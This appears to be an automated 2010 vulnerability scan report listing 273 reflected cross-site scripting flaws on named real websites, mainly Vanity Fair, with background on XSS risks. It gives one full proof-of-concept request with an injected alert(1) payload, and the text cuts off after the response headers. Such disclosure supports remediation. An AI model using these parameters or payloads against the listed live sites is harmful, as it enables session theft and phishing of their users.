Report generated by XSS.CX at Mon Nov 29 15:24:20 CST 2010.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. Cross-site scripting (reflected)

1.1. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

1.2. http://california.uscity.net/Anger_Management/x22 [REST URL parameter 1]

1.3. http://california.uscity.net/Anger_Management/x22 [REST URL parameter 2]

1.4. http://california.uscity.net/Anger_Management/x22 [name of an arbitrarily supplied request parameter]

1.5. http://dictionary.babylon.com/ [name of an arbitrarily supplied request parameter]

1.6. http://dictionary.babylon.com/ [name of an arbitrarily supplied request parameter]

1.7. http://dictionary.law.com/default2.asp [name of an arbitrarily supplied request parameter]

1.8. http://dictionary.law.com/default2.asp [submit1 parameter]

1.9. http://dictionary.law.com/default2.asp [submit1.x parameter]

1.10. http://dictionary.law.com/default2.asp [submit1.y parameter]

1.11. http://dictionary.law.com/default2.asp [typed parameter]

1.12. http://dictionary.lp.findlaw.com/scripts/search.pl [name of an arbitrarily supplied request parameter]

1.13. http://dictionary.lp.findlaw.com/scripts/search.pl [name of an arbitrarily supplied request parameter]

1.14. http://dictionary.lp.findlaw.com/scripts/search.pl [s parameter]

1.15. http://dictionary.lp.findlaw.com/scripts/search.pl [s parameter]

1.16. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]

1.17. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]

1.18. http://guide.opendns.com/ [servfail parameter]

1.19. http://guide.opendns.com/ [servfail parameter]

1.20. http://guide.opendns.com/main [oq parameter]

1.21. http://guide.opendns.com/main [q parameter]

1.22. http://guide.opendns.com/main [url parameter]

1.23. http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter]

1.24. http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter]

1.25. http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter]

1.26. http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter]

1.27. http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter]

1.28. http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter]

1.29. http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter]

1.30. http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter]

1.31. http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]

1.32. http://kona40.kontera.com/KonaGet.js [l parameter]

1.33. http://kona40.kontera.com/KonaGet.js [rId parameter]

1.34. http://kona40.kontera.com/KonaGet.js [rId parameter]

1.35. http://massachusetts.uscity.net/Anger_Management/x22 [REST URL parameter 1]

1.36. http://massachusetts.uscity.net/Anger_Management/x22 [REST URL parameter 2]

1.37. http://massachusetts.uscity.net/Anger_Management/x22 [name of an arbitrarily supplied request parameter]

1.38. http://miscellaneous.legaldictionaries.org/Canadian-Insolvency-Dictionary/ [REST URL parameter 1]

1.39. http://miscellaneous.legaldictionaries.org/Canadian-Insolvency-Dictionary/ [REST URL parameter 1]

1.40. http://miscellaneous.legaldictionaries.org/Canadian-Insolvency-Dictionary/ [REST URL parameter 1]

1.41. http://miscellaneous.legaldictionaries.org/Canadian-Insolvency-Dictionary/ [REST URL parameter 1]

1.42. http://miscellaneous.legaldictionaries.org/OJJDPs-Performance-Measures-Glossary/ [REST URL parameter 1]

1.43. http://miscellaneous.legaldictionaries.org/OJJDPs-Performance-Measures-Glossary/ [REST URL parameter 1]

1.44. http://miscellaneous.legaldictionaries.org/OJJDPs-Performance-Measures-Glossary/ [REST URL parameter 1]

1.45. http://miscellaneous.legaldictionaries.org/OJJDPs-Performance-Measures-Glossary/ [REST URL parameter 1]

1.46. http://miscellaneous.legaldictionaries.org/Presidents-DNA-Initiative-Glossary/ [REST URL parameter 1]

1.47. http://miscellaneous.legaldictionaries.org/Presidents-DNA-Initiative-Glossary/ [REST URL parameter 1]

1.48. http://miscellaneous.legaldictionaries.org/Presidents-DNA-Initiative-Glossary/ [REST URL parameter 1]

1.49. http://miscellaneous.legaldictionaries.org/Presidents-DNA-Initiative-Glossary/ [REST URL parameter 1]

1.50. http://miscellaneous.legaldictionaries.org/SBB-Glossary/ [REST URL parameter 1]

1.51. http://miscellaneous.legaldictionaries.org/SBB-Glossary/ [REST URL parameter 1]

1.52. http://miscellaneous.legaldictionaries.org/SBB-Glossary/ [REST URL parameter 1]

1.53. http://miscellaneous.legaldictionaries.org/SBB-Glossary/ [REST URL parameter 1]

1.54. http://online.babylon.com/trans_box/tbv2.php [affiliate parameter]

1.55. http://online.babylon.com/trans_box/tbv2.php [affiliate parameter]

1.56. http://online.babylon.com/trans_box/tbv2.php [bg_color parameter]

1.57. http://online.babylon.com/trans_box/tbv2.php [but parameter]

1.58. http://online.babylon.com/trans_box/tbv2.php [default_keyword parameter]

1.59. http://online.babylon.com/trans_box/tbv2.php [default_keyword parameter]

1.60. http://online.babylon.com/trans_box/tbv2.php [default_keyword parameter]

1.61. http://online.babylon.com/trans_box/tbv2.php [pic parameter]

1.62. http://online.babylon.com/trans_box/tbv2.php [sbut parameter]

1.63. http://online.babylon.com/trans_box/tbv2.php [url parameter]

1.64. http://online.babylon.com/trans_box/tbv2.php [x parameter]

1.65. http://online.babylon.com/trans_box/tbv2.php [y parameter]

1.66. http://patentandtrademark.legaldictionaries.org/European-Patent-Office-Glossary/ [REST URL parameter 1]

1.67. http://patentandtrademark.legaldictionaries.org/European-Patent-Office-Glossary/ [REST URL parameter 1]

1.68. http://patentandtrademark.legaldictionaries.org/European-Patent-Office-Glossary/ [REST URL parameter 1]

1.69. http://patentandtrademark.legaldictionaries.org/European-Patent-Office-Glossary/ [REST URL parameter 1]

1.70. http://patentandtrademark.legaldictionaries.org/PATENTSCOPE-Glossary/ [REST URL parameter 1]

1.71. http://patentandtrademark.legaldictionaries.org/PATENTSCOPE-Glossary/ [REST URL parameter 1]

1.72. http://patentandtrademark.legaldictionaries.org/PATENTSCOPE-Glossary/ [REST URL parameter 1]

1.73. http://patentandtrademark.legaldictionaries.org/PATENTSCOPE-Glossary/ [REST URL parameter 1]

1.74. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty [REST URL parameter 1]

1.75. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty [REST URL parameter 1]

1.76. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty [REST URL parameter 1]

1.77. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty)-Glossary/ [REST URL parameter 1]

1.78. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty)-Glossary/ [REST URL parameter 1]

1.79. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty)-Glossary/ [REST URL parameter 1]

1.80. http://patentandtrademark.legaldictionaries.org/PCT-(Patent-Cooperation-Treaty)-Glossary/ [REST URL parameter 1]

1.81. http://patentandtrademark.legaldictionaries.org/USPTO-Patent-and-Trademark-Glossary/ [REST URL parameter 1]

1.82. http://patentandtrademark.legaldictionaries.org/USPTO-Patent-and-Trademark-Glossary/ [REST URL parameter 1]

1.83. http://patentandtrademark.legaldictionaries.org/USPTO-Patent-and-Trademark-Glossary/ [REST URL parameter 1]

1.84. http://patentandtrademark.legaldictionaries.org/USPTO-Patent-and-Trademark-Glossary/ [REST URL parameter 1]

1.85. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

1.86. http://research.lawyers.com/Massachusetts/Divorce-in-Massachusetts.html/x22 [name of an arbitrarily supplied request parameter]

1.87. http://research.lawyers.com/Massachusetts/Massachusetts-Lawyers-Laws-and-Resources.html/x26amp [REST URL parameter 2]

1.88. http://research.lawyers.com/glossary/search.html [term parameter]

1.89. http://research.lawyers.com/glossary/search.html [term parameter]

1.90. http://research.lawyers.com/glossary/search.html [term parameter]

1.91. http://result.vanityfair.com/spring/event/most.go [callback parameter]

1.92. http://search.nolo.com/query.html [qt parameter]

1.93. https://secure.vanityfair.com/services/newsletters [name of an arbitrarily supplied request parameter]

1.94. http://sitelife.vanityfair.com/ver1.0/Direct/Jsonp [cb parameter]

1.95. http://vermont.uscity.net/Anger_Management/x22 [REST URL parameter 1]

1.96. http://vermont.uscity.net/Anger_Management/x22 [REST URL parameter 2]

1.97. http://vermont.uscity.net/Anger_Management/x22 [name of an arbitrarily supplied request parameter]

1.98. http://redcated/COM/iview/245726341/direct [REST URL parameter 4]

1.99. http://redcated/COM/iview/245726341/direct [name of an arbitrarily supplied request parameter]

1.100. http://redcated/COM/iview/245726341/direct [name of an arbitrarily supplied request parameter]

1.101. http://redcated/COM/iview/245726341/direct [name of an arbitrarily supplied request parameter]

1.102. http://redcated/COM/iview/245726341/direct [wi.300;hi.250/01?click parameter]

1.103. http://redcated/COM/iview/245726341/direct [wi.300;hi.250/01?click parameter]

1.104. http://redcated/COM/iview/245726341/http:/ads.bluelithium.com/clk [REST URL parameter 4]

1.105. http://www.addthis.com/bookmark.php [REST URL parameter 1]

1.106. http://www.addthis.com/bookmark.php [REST URL parameter 1]

1.107. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

1.108. http://www.addthis.com/bookmark.php [pub parameter]

1.109. http://www.addthis.com/bookmark.php [url parameter]

1.110. http://www.addthis.com/bookmark.php [url parameter]

1.111. http://www.angermanagementusa.com/anger-management-Vermont.php/x22 [REST URL parameter 2]

1.112. https://www.condenaststore.com/bin/venda [cntry parameter]

1.113. https://www.condenaststore.com/bin/venda [state parameter]

1.114. http://www.divorce4her.com/entr/states/massachusetts.html [REST URL parameter 1]

1.115. http://www.divorce4her.com/entr/states/massachusetts.html [REST URL parameter 2]

1.116. http://www.divorce4her.com/entr/states/massachusetts.html [REST URL parameter 3]

1.117. http://www.glamour.com/women-of-the-year/ [REST URL parameter 1]

1.118. http://www.glamour.com/women-of-the-year/ [REST URL parameter 1]

1.119. http://www.glamour.com/women-of-the-year/ [name of an arbitrarily supplied request parameter]

1.120. http://www.glamour.com/women-of-the-year/2010/dr-hawa-abdi-and-her-daughters [REST URL parameter 1]

1.121. http://www.glamour.com/women-of-the-year/2010/dr-hawa-abdi-and-her-daughters [REST URL parameter 1]

1.122. http://www.glamour.com/women-of-the-year/2010/dr-hawa-abdi-and-her-daughters [name of an arbitrarily supplied request parameter]

1.123. http://www.vanityfair.com/archive/glee [name of an arbitrarily supplied request parameter]

1.124. http://www.vanityfair.com/archive/harry-potter [name of an arbitrarily supplied request parameter]

1.125. http://www.vanityfair.com/archive/prince-william [name of an arbitrarily supplied request parameter]

1.126. http://www.vanityfair.com/archive/writers-reading [name of an arbitrarily supplied request parameter]

1.127. http://www.vanityfair.com/business/features/2010/10/greeks-bearing-bonds-201010 [name of an arbitrarily supplied request parameter]

1.128. http://www.vanityfair.com/business/features/2010/10/greeks-bearing-bonds-response-201010 [name of an arbitrarily supplied request parameter]

1.129. http://www.vanityfair.com/business/features/2010/12/jean-pigozzi-201012 [name of an arbitrarily supplied request parameter]

1.130. http://www.vanityfair.com/contributors/bramble-trionfo [name of an arbitrarily supplied request parameter]

1.131. http://www.vanityfair.com/contributors/james-wolcott [name of an arbitrarily supplied request parameter]

1.132. http://www.vanityfair.com/contributors/juli-weiner [name of an arbitrarily supplied request parameter]

1.133. http://www.vanityfair.com/contributors/marnie-hanel [name of an arbitrarily supplied request parameter]

1.134. http://www.vanityfair.com/contributors/mike-ryan [name of an arbitrarily supplied request parameter]

1.135. http://www.vanityfair.com/contributors/sarah-ball [name of an arbitrarily supplied request parameter]

1.136. http://www.vanityfair.com/culture/features/2010/10/sean-parker-201010 [name of an arbitrarily supplied request parameter]

1.137. http://www.vanityfair.com/culture/features/2010/11/basquiat-slide-show-201011 [name of an arbitrarily supplied request parameter]

1.138. http://www.vanityfair.com/culture/features/2010/11/james-hamilton-slide-show-201011 [name of an arbitrarily supplied request parameter]

1.139. http://www.vanityfair.com/culture/features/2010/11/joy-division-slide-show-201011 [name of an arbitrarily supplied request parameter]

1.140. http://www.vanityfair.com/culture/features/2010/11/kanye-201011 [name of an arbitrarily supplied request parameter]

1.141. http://www.vanityfair.com/culture/features/2010/11/rolling-stones-slide-show-201011 [name of an arbitrarily supplied request parameter]

1.142. http://www.vanityfair.com/culture/features/2010/11/thanksgiving-pilgrim-midterms-201011 [name of an arbitrarily supplied request parameter]

1.143. http://www.vanityfair.com/culture/features/2010/12/npr-slide-show-201012 [name of an arbitrarily supplied request parameter]

1.144. http://www.vanityfair.com/culture/features/2010/12/vanishing-blonde-201012 [name of an arbitrarily supplied request parameter]

1.145. http://www.vanityfair.com/culture/features/2010/12/walters-201012 [name of an arbitrarily supplied request parameter]

1.146. http://www.vanityfair.com/culture/features/incharacter-slideshow [name of an arbitrarily supplied request parameter]

1.147. http://www.vanityfair.com/culture/features/vanities-slideshow [name of an arbitrarily supplied request parameter]

1.148. http://www.vanityfair.com/culture/yearinreview/hubris-maximus-201012 [name of an arbitrarily supplied request parameter]

1.149. http://www.vanityfair.com/culture/yearinreview/year-in-photos-slide-show-201011 [name of an arbitrarily supplied request parameter]

1.150. http://www.vanityfair.com/hollywood/features/2001/10/harry-potter-slide-show-200110 [name of an arbitrarily supplied request parameter]

1.151. http://www.vanityfair.com/hollywood/features/2010/11/industrial-light-and-magic-201011 [name of an arbitrarily supplied request parameter]

1.152. http://www.vanityfair.com/hollywood/features/2010/12/cher-201012 [name of an arbitrarily supplied request parameter]

1.153. http://www.vanityfair.com/hollywood/features/2010/12/cher-chutzpah-slide-show-201012 [name of an arbitrarily supplied request parameter]

1.154. http://www.vanityfair.com/hollywood/features/2010/12/olivia-wilde-slide-show-201012 [name of an arbitrarily supplied request parameter]

1.155. http://www.vanityfair.com/magazine/2010/12/graydon-201012 [name of an arbitrarily supplied request parameter]

1.156. http://www.vanityfair.com/magazine/2011/01/60-minutes-poll-201101 [name of an arbitrarily supplied request parameter]

1.157. http://www.vanityfair.com/magazine/search [name of an arbitrarily supplied request parameter]

1.158. http://www.vanityfair.com/magazine/toc/contents-201010 [name of an arbitrarily supplied request parameter]

1.159. http://www.vanityfair.com/magazine/toc/contents-201012 [name of an arbitrarily supplied request parameter]

1.160. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html [REST URL parameter 3]

1.161. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html [REST URL parameter 3]

1.162. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html [REST URL parameter 4]

1.163. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html [REST URL parameter 4]

1.164. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html [REST URL parameter 5]

1.165. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-light-bright.html [REST URL parameter 5]

1.166. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html [REST URL parameter 3]

1.167. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html [REST URL parameter 3]

1.168. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html [REST URL parameter 4]

1.169. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html [REST URL parameter 4]

1.170. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html [REST URL parameter 5]

1.171. http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html [REST URL parameter 5]

1.172. http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html [REST URL parameter 3]

1.173. http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html [REST URL parameter 3]

1.174. http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html [REST URL parameter 4]

1.175. http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html [REST URL parameter 4]

1.176. http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html [REST URL parameter 5]

1.177. http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html [REST URL parameter 5]

1.178. http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html [REST URL parameter 3]

1.179. http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html [REST URL parameter 3]

1.180. http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html [REST URL parameter 4]

1.181. http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html [REST URL parameter 4]

1.182. http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html [REST URL parameter 5]

1.183. http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html [REST URL parameter 5]

1.184. http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html [REST URL parameter 3]

1.185. http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html [REST URL parameter 3]

1.186. http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html [REST URL parameter 4]

1.187. http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html [REST URL parameter 4]

1.188. http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html [REST URL parameter 5]

1.189. http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html [REST URL parameter 5]

1.190. http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html [REST URL parameter 3]

1.191. http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html [REST URL parameter 3]

1.192. http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html [REST URL parameter 4]

1.193. http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html [REST URL parameter 4]

1.194. http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html [REST URL parameter 5]

1.195. http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html [REST URL parameter 5]

1.196. http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html [REST URL parameter 3]

1.197. http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html [REST URL parameter 3]

1.198. http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html [REST URL parameter 4]

1.199. http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html [REST URL parameter 4]

1.200. http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html [REST URL parameter 5]

1.201. http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html [REST URL parameter 5]

1.202. http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html [REST URL parameter 3]

1.203. http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html [REST URL parameter 3]

1.204. http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html [REST URL parameter 4]

1.205. http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html [REST URL parameter 4]

1.206. http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html [REST URL parameter 5]

1.207. http://www.vanityfair.com/online/daily/2010/11/wikileaks-blind-items.html [REST URL parameter 5]

1.208. http://www.vanityfair.com/online/daily/art [REST URL parameter 3]

1.209. http://www.vanityfair.com/online/daily/art [REST URL parameter 3]

1.210. http://www.vanityfair.com/online/daily/books [REST URL parameter 3]

1.211. http://www.vanityfair.com/online/daily/books [REST URL parameter 3]

1.212. http://www.vanityfair.com/online/daily/gifts [REST URL parameter 3]

1.213. http://www.vanityfair.com/online/daily/gifts [REST URL parameter 3]

1.214. http://www.vanityfair.com/online/daily/gossip-pack [REST URL parameter 3]

1.215. http://www.vanityfair.com/online/daily/gossip-pack [REST URL parameter 3]

1.216. http://www.vanityfair.com/online/oscars/2010/10/irvin-kershner.html [REST URL parameter 3]

1.217. http://www.vanityfair.com/online/oscars/2010/10/irvin-kershner.html [REST URL parameter 4]

1.218. http://www.vanityfair.com/online/oscars/2010/10/irvin-kershner.html [REST URL parameter 5]

1.219. http://www.vanityfair.com/online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html [REST URL parameter 3]

1.220. http://www.vanityfair.com/online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html [REST URL parameter 4]

1.221. http://www.vanityfair.com/online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html [REST URL parameter 5]

1.222. http://www.vanityfair.com/online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html [REST URL parameter 3]

1.223. http://www.vanityfair.com/online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html [REST URL parameter 4]

1.224. http://www.vanityfair.com/online/oscars/2010/11/paula-deen-on-thanksgiving-her-blood-pressure-and-the-butter-scene-in-last-tango-in-paris.html [REST URL parameter 5]

1.225. http://www.vanityfair.com/online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html [REST URL parameter 3]

1.226. http://www.vanityfair.com/online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html [REST URL parameter 4]

1.227. http://www.vanityfair.com/online/oscars/2010/11/qa-geoffrey-rush-on-f-bombs-unfair-ratings-and-the-kings-speech.html [REST URL parameter 5]

1.228. http://www.vanityfair.com/online/oscars/25-questions [REST URL parameter 3]

1.229. http://www.vanityfair.com/online/oscars/boardwalk-empire/ [REST URL parameter 3]

1.230. http://www.vanityfair.com/online/oscars/glee-cap/ [REST URL parameter 3]

1.231. http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html [REST URL parameter 3]

1.232. http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html [REST URL parameter 3]

1.233. http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html [REST URL parameter 4]

1.234. http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html [REST URL parameter 4]

1.235. http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html [REST URL parameter 5]

1.236. http://www.vanityfair.com/online/wolcott/2010/11/as-im-sure-some-of.html [REST URL parameter 5]

1.237. http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html [REST URL parameter 3]

1.238. http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html [REST URL parameter 3]

1.239. http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html [REST URL parameter 4]

1.240. http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html [REST URL parameter 4]

1.241. http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html [REST URL parameter 5]

1.242. http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html [REST URL parameter 5]

1.243. http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html [REST URL parameter 3]

1.244. http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html [REST URL parameter 3]

1.245. http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html [REST URL parameter 4]

1.246. http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html [REST URL parameter 4]

1.247. http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html [REST URL parameter 5]

1.248. http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html [REST URL parameter 5]

1.249. http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html [REST URL parameter 3]

1.250. http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html [REST URL parameter 3]

1.251. http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html [REST URL parameter 4]

1.252. http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html [REST URL parameter 4]

1.253. http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html [REST URL parameter 5]

1.254. http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html [REST URL parameter 5]

1.255. http://www.vanityfair.com/politics/features/2004/01/plame200401 [name of an arbitrarily supplied request parameter]

1.256. http://www.vanityfair.com/politics/features/2010/10/sarah-palin-201010 [name of an arbitrarily supplied request parameter]

1.257. http://www.vanityfair.com/politics/features/2010/11/election-night-slide-show-201011 [name of an arbitrarily supplied request parameter]

1.258. http://www.vanityfair.com/search [name of an arbitrarily supplied request parameter]

1.259. http://www.vanityfair.com/search [query parameter]

1.260. http://www.vanityfair.com/search [query parameter]

1.261. http://www.vanityfair.com/services/privacypolicy [name of an arbitrarily supplied request parameter]

1.262. http://www.vanityfair.com/services/privacypolicy [printable parameter]

1.263. http://www.vanityfair.com/services/rss/summary [name of an arbitrarily supplied request parameter]

1.264. http://www.vanityfair.com/services/useragreement [name of an arbitrarily supplied request parameter]

1.265. http://www.vanityfair.com/society/features/2010/12/prince-william-and-kate-slide-show-201012 [name of an arbitrarily supplied request parameter]

1.266. http://www.vanityfair.com/society/features/2010/12/william-and-kate-201012 [name of an arbitrarily supplied request parameter]

1.267. http://www.vanityfair.com/style/features/2010/11/bergdorf-goodman-201011 [name of an arbitrarily supplied request parameter]

1.268. http://www.vanityfair.com/style/giftguide/fanfair-gift-guide-201012 [name of an arbitrarily supplied request parameter]

1.269. http://www.vanityfair.com/style/giftguide/holiday-beauty-201012 [name of an arbitrarily supplied request parameter]

1.270. http://dictionary.lp.findlaw.com/scripts/search.pl [Referer HTTP header]

1.271. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.272. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.273. http://www.ehow.com/list_6060692_divorce-abandonment-laws-georgia.html/x22 [Referer HTTP header]



1. Cross-site scripting (reflected)
There are 273 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20fa0"-alert(1)-"f46a6512895 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&section=844600&20fa0"-alert(1)-"f46a6512895=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://guide.opendns.com/main?url=advancedmags.com&servfail=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:56:14 GMT
Server: YTS/1.18.4
